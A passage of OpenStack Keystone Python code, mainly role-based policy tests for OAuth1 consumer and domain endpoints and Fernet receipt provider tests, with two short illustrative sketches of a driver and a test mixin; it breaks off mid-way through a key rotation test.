field. If these requirements are not met the behavior is undefined.
:raises keystone.exception.Conflict: if the project id already exists
or the name already exists for the domain_id.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def get_project_by_name(self, project_name, domain_id):
"""Get a project by name.
:returns: project_ref
:raises keystone.exception.ProjectNotFound: if a project with the
project_name does not exist within the domain
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def delete_projects_from_ids(self, project_ids):
"""Delete a given list of projects.
Deletes a list of projects. Ensures no project on the list exists
after it is successfully called. If an empty list is provided,
        it is silently ignored. In addition, if a project ID in the list
of project_ids is not found in the backend, no exception is raised,
but a message is logged.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def list_projects_acting_as_domain(self, hints):
"""List all projects acting as domains.
:param hints: filter hints which the driver should
implement if at all possible.
:returns: a list of project_refs or an empty list.
"""
raise exception.NotImplemented() # pragma: no cover
def check_project_depth(self, max_depth):
"""Check the projects depth in the backend whether exceed the limit.
:param max_depth: the limit depth that project depth should not exceed.
:type max_depth: integer
        :returns: the ID of the project that exceeds the depth limit, or None if none does.
"""
raise exception.NotImplemented() # pragma: no cover
```
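For illustration, here is a minimal, hypothetical in-memory sketch of the driver contract above. It is not a real keystone backend: only a few methods are shown, hint filtering is omitted, and a concrete driver must implement every abstract method before it can be instantiated.

```python
# Hypothetical in-memory sketch of the ResourceDriverBase contract.
class InMemoryResourceDriver(ResourceDriverBase):
    def __init__(self):
        self._projects = {}  # project_id -> project_ref

    def create_project(self, project_id, project):
        if project['id'] in self._projects:
            raise exception.Conflict(type='project', details=project['id'])
        self._projects[project['id']] = dict(project)
        return self._projects[project['id']]

    def get_project(self, project_id):
        try:
            return self._projects[project_id]
        except KeyError:
            raise exception.ProjectNotFound(project_id=project_id)

    def list_projects(self, hints):
        # Hint-based filtering is omitted for brevity.
        return list(self._projects.values())

    def list_projects_from_ids(self, project_ids):
        ids = set(project_ids)
        return [p for pid, p in self._projects.items() if pid in ids]
```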
#### File: protection/v3/test_consumer.py
```python
import uuid
import http.client
from keystone.common import provider_api
import keystone.conf
from keystone.tests.common import auth as common_auth
from keystone.tests import unit
from keystone.tests.unit import base_classes
from keystone.tests.unit import ksfixtures
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class _SystemUserOauth1ConsumerTests(object):
"""Common default functionality for all system users."""
def test_user_can_get_consumer(self):
ref = PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.get('/v3/OS-OAUTH1/consumers/%s' % ref['id'],
headers=self.headers)
def test_user_can_list_consumers(self):
PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.get('/v3/OS-OAUTH1/consumers',
headers=self.headers)
class _SystemReaderAndMemberOauth1ConsumerTests(object):
def test_user_cannot_create_consumer(self):
with self.test_client() as c:
c.post('/v3/OS-OAUTH1/consumers',
json={'consumer': {}},
expected_status_code=http.client.FORBIDDEN,
headers=self.headers)
def test_user_cannot_update_consumer(self):
ref = PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.patch('/v3/OS-OAUTH1/consumers/%s' % ref['id'],
json={'consumer': {'description': uuid.uuid4().hex}},
expected_status_code=http.client.FORBIDDEN,
headers=self.headers)
def test_user_cannot_delete_consumer(self):
ref = PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.delete('/v3/OS-OAUTH1/consumers/%s' % ref['id'],
expected_status_code=http.client.FORBIDDEN,
headers=self.headers)
class SystemReaderTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserOauth1ConsumerTests,
_SystemReaderAndMemberOauth1ConsumerTests):
def setUp(self):
super(SystemReaderTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_reader = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.user_id = PROVIDERS.identity_api.create_user(
system_reader
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.user_id, self.bootstrapper.reader_role_id
)
auth = self.build_authentication_request(
user_id=self.user_id, password=system_reader['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class SystemMemberTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserOauth1ConsumerTests,
_SystemReaderAndMemberOauth1ConsumerTests):
def setUp(self):
super(SystemMemberTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_member = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.user_id = PROVIDERS.identity_api.create_user(
system_member
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.user_id, self.bootstrapper.member_role_id
)
auth = self.build_authentication_request(
            user_id=self.user_id, password=system_member['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class SystemAdminTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserOauth1ConsumerTests):
def setUp(self):
super(SystemAdminTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
# Reuse the system administrator account created during
# ``keystone-manage bootstrap``
self.user_id = self.bootstrapper.admin_user_id
auth = self.build_authentication_request(
user_id=self.user_id,
password=self.bootstrapper.admin_password,
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
def test_user_can_create_consumer(self):
with self.test_client() as c:
c.post('/v3/OS-OAUTH1/consumers',
json={'consumer': {}},
headers=self.headers)
def test_user_can_update_consumer(self):
ref = PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.patch('/v3/OS-OAUTH1/consumers/%s' % ref['id'],
json={'consumer': {'description': uuid.uuid4().hex}},
headers=self.headers)
def test_user_can_delete_consumer(self):
ref = PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.delete('/v3/OS-OAUTH1/consumers/%s' % ref['id'],
headers=self.headers)
```
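Each test class above repeats the same persona setup: create a user, grant a role, authenticate, and keep the resulting token in request headers. A hypothetical mixin capturing that recurring pattern might look like the sketch below (names are illustrative, not part of the keystone test suite).

```python
# Hypothetical helper factoring out the persona setup repeated above.
# Assumes the host class provides test_client() and
# build_authentication_request(), plus the PROVIDERS/unit/CONF globals.
class PersonaSetupMixin(object):
    def setup_system_persona(self, role_id):
        user = unit.new_user_ref(domain_id=CONF.identity.default_domain_id)
        user_id = PROVIDERS.identity_api.create_user(user)['id']
        PROVIDERS.assignment_api.create_system_grant_for_user(
            user_id, role_id
        )
        auth = self.build_authentication_request(
            user_id=user_id, password=user['password'], system=True
        )
        # Grab a token for the persona and build headers for later requests.
        with self.test_client() as c:
            r = c.post('/v3/auth/tokens', json=auth)
        return user_id, {'X-Auth-Token': r.headers['X-Subject-Token']}
```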
#### File: protection/v3/test_domains.py
```python
import uuid
import http.client
from oslo_serialization import jsonutils
from keystone.common.policies import domain as dp
from keystone.common import provider_api
import keystone.conf
from keystone.tests.common import auth as common_auth
from keystone.tests import unit
from keystone.tests.unit import base_classes
from keystone.tests.unit import ksfixtures
from keystone.tests.unit.ksfixtures import temporaryfile
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class _SystemUserDomainTests(object):
def test_user_can_list_domains(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
r = c.get('/v3/domains', headers=self.headers)
domain_ids = []
            for listed_domain in r.json['domains']:
                domain_ids.append(listed_domain['id'])
            self.assertIn(domain['id'], domain_ids)
def test_user_can_filter_domains_by_name(self):
domain_name = uuid.uuid4().hex
domain = unit.new_domain_ref(name=domain_name)
domain = PROVIDERS.resource_api.create_domain(domain['id'], domain)
PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
r = c.get(
'/v3/domains?name=%s' % domain_name,
headers=self.headers
)
self.assertEqual(1, len(r.json['domains']))
self.assertEqual(domain['id'], r.json['domains'][0]['id'])
def test_user_can_filter_domains_by_enabled(self):
enabled_domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
disabled_domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref(enabled=False)
)
with self.test_client() as c:
r = c.get('/v3/domains?enabled=true', headers=self.headers)
enabled_domain_ids = []
for domain in r.json['domains']:
enabled_domain_ids.append(domain['id'])
self.assertIn(enabled_domain['id'], enabled_domain_ids)
self.assertNotIn(disabled_domain['id'], enabled_domain_ids)
r = c.get('/v3/domains?enabled=false', headers=self.headers)
disabled_domain_ids = []
for domain in r.json['domains']:
disabled_domain_ids.append(domain['id'])
self.assertIn(disabled_domain['id'], disabled_domain_ids)
self.assertNotIn(enabled_domain['id'], disabled_domain_ids)
def test_user_can_get_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
r = c.get('/v3/domains/%s' % domain['id'], headers=self.headers)
self.assertEqual(domain['id'], r.json['domain']['id'])
class _SystemMemberAndReaderDomainTests(object):
def test_user_cannot_create_a_domain(self):
create = {'domain': {'name': uuid.uuid4().hex}}
with self.test_client() as c:
c.post(
'/v3/domains', json=create, headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_update_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
update = {'domain': {'description': uuid.uuid4().hex}}
with self.test_client() as c:
c.patch(
'/v3/domains/%s' % domain['id'], json=update,
headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_delete_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
c.delete(
'/v3/domains/%s' % domain['id'], headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
class _DomainAndProjectUserDomainTests(object):
def test_user_can_get_a_domain(self):
with self.test_client() as c:
r = c.get('/v3/domains/%s' % self.domain_id, headers=self.headers)
self.assertEqual(self.domain_id, r.json['domain']['id'])
def test_user_cannot_get_a_domain_they_are_not_authorized_to_access(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
c.get(
'/v3/domains/%s' % domain['id'], headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_list_domains(self):
with self.test_client() as c:
c.get(
'/v3/domains', headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_filter_domains_by_name(self):
domain_name = uuid.uuid4().hex
domain = unit.new_domain_ref(name=domain_name)
domain = PROVIDERS.resource_api.create_domain(domain['id'], domain)
PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
c.get(
'/v3/domains?name=%s' % domain_name,
headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_filter_domains_by_enabled(self):
with self.test_client() as c:
c.get(
'/v3/domains?enabled=true', headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
c.get(
'/v3/domains?enabled=false', headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_update_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
update = {'domain': {'description': uuid.uuid4().hex}}
with self.test_client() as c:
c.patch(
'/v3/domains/%s' % domain['id'], json=update,
headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_create_a_domain(self):
create = {'domain': {'name': uuid.uuid4().hex}}
with self.test_client() as c:
c.post(
'/v3/domains', json=create, headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_delete_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
update = {'domain': {'enabled': False}}
path = '/v3/domains/%s' % domain['id']
c.patch(
path, json=update, headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
c.delete(
path, headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
    def test_user_cannot_get_non_existent_domain_forbidden(self):
with self.test_client() as c:
c.get(
'/v3/domains/%s' % uuid.uuid4().hex,
headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
class SystemReaderTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserDomainTests,
_SystemMemberAndReaderDomainTests):
def setUp(self):
super(SystemReaderTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_reader = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.system_reader_id = PROVIDERS.identity_api.create_user(
system_reader
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.system_reader_id, self.bootstrapper.reader_role_id
)
auth = self.build_authentication_request(
            user_id=self.system_reader_id, password=system_reader['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class SystemMemberTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserDomainTests,
_SystemMemberAndReaderDomainTests):
def setUp(self):
super(SystemMemberTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_member = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.system_member_id = PROVIDERS.identity_api.create_user(
system_member
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.system_member_id, self.bootstrapper.member_role_id
)
auth = self.build_authentication_request(
            user_id=self.system_member_id, password=system_member['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class SystemAdminTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserDomainTests):
def setUp(self):
super(SystemAdminTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
self.system_admin_id = self.bootstrapper.admin_user_id
auth = self.build_authentication_request(
user_id=self.system_admin_id,
            password=self.bootstrapper.admin_password,
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
def test_user_can_update_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
update = {'domain': {'description': uuid.uuid4().hex}}
with self.test_client() as c:
c.patch(
'/v3/domains/%s' % domain['id'], json=update,
headers=self.headers
)
def test_user_can_create_a_domain(self):
create = {'domain': {'name': uuid.uuid4().hex}}
with self.test_client() as c:
c.post(
'/v3/domains', json=create, headers=self.headers
)
def test_user_can_delete_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
update = {'domain': {'enabled': False}}
path = '/v3/domains/%s' % domain['id']
c.patch(path, json=update, headers=self.headers)
c.delete(path, headers=self.headers)
class DomainUserTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserDomainTests):
def setUp(self):
super(DomainUserTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
self.domain_id = domain['id']
domain_user = unit.new_user_ref(domain_id=self.domain_id)
self.domain_user_id = PROVIDERS.identity_api.create_user(
domain_user
)['id']
PROVIDERS.assignment_api.create_grant(
self.bootstrapper.member_role_id, user_id=self.domain_user_id,
domain_id=self.domain_id
)
auth = self.build_authentication_request(
user_id=self.domain_user_id, password=domain_user['password'],
domain_id=self.domain_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class ProjectReaderTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserDomainTests):
def setUp(self):
super(ProjectReaderTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
self.domain_id = domain['id']
project_reader = unit.new_user_ref(domain_id=self.domain_id)
project_reader_id = PROVIDERS.identity_api.create_user(
project_reader
)['id']
project = unit.new_project_ref(domain_id=self.domain_id)
project_id = PROVIDERS.resource_api.create_project(
project['id'], project
)['id']
PROVIDERS.assignment_api.create_grant(
self.bootstrapper.reader_role_id, user_id=project_reader_id,
project_id=project_id
)
auth = self.build_authentication_request(
user_id=project_reader_id,
            password=project_reader['password'],
project_id=project_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class ProjectMemberTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserDomainTests):
def setUp(self):
super(ProjectMemberTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
self.domain_id = domain['id']
project_member = unit.new_user_ref(domain_id=self.domain_id)
project_member_id = PROVIDERS.identity_api.create_user(
project_member
)['id']
project = unit.new_project_ref(domain_id=self.domain_id)
project_id = PROVIDERS.resource_api.create_project(
project['id'], project
)['id']
PROVIDERS.assignment_api.create_grant(
self.bootstrapper.member_role_id, user_id=project_member_id,
project_id=project_id
)
auth = self.build_authentication_request(
user_id=project_member_id,
password=project_member['password'],
project_id=project_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class ProjectAdminTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserDomainTests):
def setUp(self):
super(ProjectAdminTests, self).setUp()
self.loadapp()
self.policy_file = self.useFixture(temporaryfile.SecureTempFile())
self.policy_file_name = self.policy_file.file_name
self.useFixture(
ksfixtures.Policy(
self.config_fixture, policy_file=self.policy_file_name
)
)
self._override_policy()
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
self.domain_id = domain['id']
project_admin = unit.new_user_ref(domain_id=self.domain_id)
project_admin_id = PROVIDERS.identity_api.create_user(
project_admin
)['id']
project = unit.new_project_ref(domain_id=self.domain_id)
project_id = PROVIDERS.resource_api.create_project(
project['id'], project
)['id']
PROVIDERS.assignment_api.create_grant(
self.bootstrapper.admin_role_id, user_id=project_admin_id,
project_id=project_id
)
auth = self.build_authentication_request(
user_id=project_admin_id,
            password=project_admin['password'],
project_id=project_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
def _override_policy(self):
# TODO(lbragstad): Remove this once the deprecated policies in
# keystone.common.policies.domains have been removed. This is only
# here to make sure we test the new policies instead of the deprecated
# ones. Oslo.policy will OR deprecated policies with new policies to
# maintain compatibility and give operators a chance to update
# permissions or update policies without breaking users. This will
# cause these specific tests to fail since we're trying to correct this
# broken behavior with better scope checking.
with open(self.policy_file_name, 'w') as f:
overridden_policies = {
'identity:get_domain': (
dp.SYSTEM_USER_OR_DOMAIN_USER_OR_PROJECT_USER
)
}
f.write(jsonutils.dumps(overridden_policies))
```
#### File: unit/receipt/test_fernet_provider.py
```python
import base64
import datetime
import hashlib
import os
from unittest import mock
import uuid
from oslo_utils import timeutils
from keystone.common import fernet_utils
from keystone.common import provider_api
from keystone.common import utils
import keystone.conf
from keystone import exception
from keystone.identity.backends import resource_options as ro
from keystone.receipt.providers import fernet
from keystone.receipt import receipt_formatters
from keystone.tests import unit
from keystone.tests.unit import default_fixtures
from keystone.tests.unit import ksfixtures
from keystone.tests.unit.ksfixtures import database
from keystone.token import provider as token_provider
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class TestFernetReceiptProvider(unit.TestCase):
def setUp(self):
super(TestFernetReceiptProvider, self).setUp()
self.provider = fernet.Provider()
def test_invalid_receipt_raises_receipt_not_found(self):
receipt_id = uuid.uuid4().hex
e = self.assertRaises(
exception.ReceiptNotFound,
self.provider.validate_receipt,
receipt_id)
self.assertIn(receipt_id, u'%s' % e)
class TestValidate(unit.TestCase):
def setUp(self):
super(TestValidate, self).setUp()
self.useFixture(database.Database())
self.useFixture(
ksfixtures.ConfigAuthPlugins(
self.config_fixture,
['totp', 'token', 'password']))
self.load_backends()
PROVIDERS.resource_api.create_domain(
default_fixtures.ROOT_DOMAIN['id'], default_fixtures.ROOT_DOMAIN)
def config_overrides(self):
super(TestValidate, self).config_overrides()
self.config_fixture.config(group='receipt', provider='fernet')
def test_validate_v3_receipt_simple(self):
# Check the fields in the receipt result when use validate_v3_receipt
# with a simple receipt.
domain_ref = unit.new_domain_ref()
domain_ref = PROVIDERS.resource_api.create_domain(
domain_ref['id'], domain_ref
)
rule_list = [
            ['password', 'totp'],
            ['password', 'totp', 'token'],
]
user_ref = unit.new_user_ref(domain_ref['id'])
user_ref = PROVIDERS.identity_api.create_user(user_ref)
user_ref['options'][ro.MFA_RULES_OPT.option_name] = rule_list
user_ref['options'][ro.MFA_ENABLED_OPT.option_name] = True
PROVIDERS.identity_api.update_user(user_ref['id'], user_ref)
method_names = ['password']
receipt = PROVIDERS.receipt_provider_api.\
issue_receipt(user_ref['id'], method_names)
receipt = PROVIDERS.receipt_provider_api.validate_receipt(
receipt.id)
self.assertIsInstance(receipt.expires_at, str)
self.assertIsInstance(receipt.issued_at, str)
self.assertEqual(set(method_names), set(receipt.methods))
self.assertEqual(
set(frozenset(r) for r in rule_list),
set(frozenset(r) for r in
receipt.required_methods))
self.assertEqual(user_ref['id'], receipt.user_id)
def test_validate_v3_receipt_validation_error_exc(self):
# When the receipt format isn't recognized, ReceiptNotFound is raised.
# A uuid string isn't a valid Fernet receipt.
receipt_id = uuid.uuid4().hex
self.assertRaises(
exception.ReceiptNotFound,
PROVIDERS.receipt_provider_api.validate_receipt,
receipt_id
)
class TestReceiptFormatter(unit.TestCase):
def test_restore_padding(self):
# 'a' will result in '==' padding, 'aa' will result in '=' padding, and
# 'aaa' will result in no padding.
binary_to_test = [b'a', b'aa', b'aaa']
for binary in binary_to_test:
# base64.urlsafe_b64encode takes bytes and returns
# bytes.
encoded_string = base64.urlsafe_b64encode(binary)
encoded_string = encoded_string.decode('utf-8')
# encoded_string is now str.
encoded_str_without_padding = encoded_string.rstrip('=')
self.assertFalse(encoded_str_without_padding.endswith('='))
encoded_str_with_padding_restored = (
receipt_formatters.ReceiptFormatter.restore_padding(
encoded_str_without_padding)
)
self.assertEqual(encoded_string, encoded_str_with_padding_restored)
class TestPayloads(unit.TestCase):
def setUp(self):
super(TestPayloads, self).setUp()
self.useFixture(
ksfixtures.ConfigAuthPlugins(
self.config_fixture, ['totp', 'token', 'password']))
def assertTimestampsEqual(self, expected, actual):
# The timestamp that we get back when parsing the payload may not
# exactly match the timestamp that was put in the payload due to
# conversion to and from a float.
exp_time = timeutils.parse_isotime(expected)
actual_time = timeutils.parse_isotime(actual)
        # The granularity of the timestamp string is microseconds, and it's
        # only the last digit in the representation that may differ, so use
        # a small delta (ten microseconds) for the comparison.
return self.assertCloseEnoughForGovernmentWork(exp_time, actual_time,
delta=1e-05)
def test_strings_can_be_converted_to_bytes(self):
s = token_provider.random_urlsafe_str()
self.assertIsInstance(s, str)
b = receipt_formatters.ReceiptPayload.random_urlsafe_str_to_bytes(s)
self.assertIsInstance(b, bytes)
def test_uuid_hex_to_byte_conversions(self):
payload_cls = receipt_formatters.ReceiptPayload
expected_hex_uuid = uuid.uuid4().hex
uuid_obj = uuid.UUID(expected_hex_uuid)
expected_uuid_in_bytes = uuid_obj.bytes
actual_uuid_in_bytes = payload_cls.convert_uuid_hex_to_bytes(
expected_hex_uuid)
self.assertEqual(expected_uuid_in_bytes, actual_uuid_in_bytes)
actual_hex_uuid = payload_cls.convert_uuid_bytes_to_hex(
expected_uuid_in_bytes)
self.assertEqual(expected_hex_uuid, actual_hex_uuid)
def test_time_string_to_float_conversions(self):
payload_cls = receipt_formatters.ReceiptPayload
original_time_str = utils.isotime(subsecond=True)
time_obj = timeutils.parse_isotime(original_time_str)
expected_time_float = (
(timeutils.normalize_time(time_obj) -
datetime.datetime.utcfromtimestamp(0)).total_seconds())
# NOTE(lbragstad): The receipt expiration time for Fernet receipts is
# passed in the payload of the receipt. This is different from the
# receipt creation time, which is handled by Fernet and doesn't support
# subsecond precision because it is a timestamp integer.
self.assertIsInstance(expected_time_float, float)
actual_time_float = payload_cls._convert_time_string_to_float(
original_time_str)
self.assertIsInstance(actual_time_float, float)
self.assertEqual(expected_time_float, actual_time_float)
# Generate expected_time_str using the same time float. Using
# original_time_str from utils.isotime will occasionally fail due to
# floating point rounding differences.
time_object = datetime.datetime.utcfromtimestamp(actual_time_float)
expected_time_str = utils.isotime(time_object, subsecond=True)
actual_time_str = payload_cls._convert_float_to_time_string(
actual_time_float)
self.assertEqual(expected_time_str, actual_time_str)
def _test_payload(self, payload_class, exp_user_id=None, exp_methods=None):
exp_user_id = exp_user_id or uuid.uuid4().hex
exp_methods = exp_methods or ['password']
exp_expires_at = utils.isotime(timeutils.utcnow(), subsecond=True)
payload = payload_class.assemble(
exp_user_id, exp_methods, exp_expires_at)
(user_id, methods, expires_at) = payload_class.disassemble(payload)
self.assertEqual(exp_user_id, user_id)
self.assertEqual(exp_methods, methods)
self.assertTimestampsEqual(exp_expires_at, expires_at)
def test_payload(self):
self._test_payload(receipt_formatters.ReceiptPayload)
def test_payload_multiple_methods(self):
self._test_payload(
receipt_formatters.ReceiptPayload,
exp_methods=['password', 'totp'])
class TestFernetKeyRotation(unit.TestCase):
def setUp(self):
super(TestFernetKeyRotation, self).setUp()
# A collection of all previously-seen signatures of the key
# repository's contents.
self.key_repo_signatures = set()
@property
def keys(self):
"""Key files converted to numbers."""
return sorted(
int(x) for x in os.listdir(CONF.fernet_receipts.key_repository))
@property
def key_repository_size(self):
"""The number of keys in the key repository."""
return len(self.keys)
@property
def key_repository_signature(self):
"""Create a "thumbprint" of the current key repository.
Because key files are renamed, this produces a hash of the contents of
the key files, ignoring their filenames.
The resulting signature can be used, for example, to ensure that you
have a unique set of keys after you perform a key rotation (taking a
static set of keys, and simply shuffling them, would fail such a test).
"""
# Load the keys into a list, keys is list of str.
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
keys = key_utils.load_keys()
# Sort the list of keys by the keys themselves (they were previously
# sorted by filename).
keys.sort()
# Create the thumbprint using all keys in the repository.
signature = hashlib.sha1()
for key in keys:
# Need to convert key to bytes for update.
signature.update(key.encode('utf-8'))
return signature.hexdigest()
def assertRepositoryState(self, expected_size):
"""Validate the state of the key repository."""
self.assertEqual(expected_size, self.key_repository_size)
self.assertUniqueRepositoryState()
def assertUniqueRepositoryState(self):
"""Ensure that the current key repo state has not been seen before."""
# This is assigned to a variable because it takes some work to
# calculate.
signature = self.key_repository_signature
# Ensure the signature is not in the set of previously seen signatures.
self.assertNotIn(signature, self.key_repo_signatures)
# Add the signature to the set of repository signatures to validate
# that we don't see it again later.
self.key_repo_signatures.add(signature)
def test_rotation(self):
# Initializing a key repository results in this many keys. We don't
# support max_active_keys being set any lower.
min_active_keys = 2
# Simulate every rotation strategy up to "rotating once a week while
# maintaining a year's worth of keys."
for max_active_keys in range(min_active_keys, 52 + 1):
self.config_fixture.config(group='fernet_receipts',
max_active_keys=max_active_keys)
# Ensure that resetting the key repository always results in 2
# active keys.
self.useFixture(
ksfixtures.KeyRepository(
self.config_fixture,
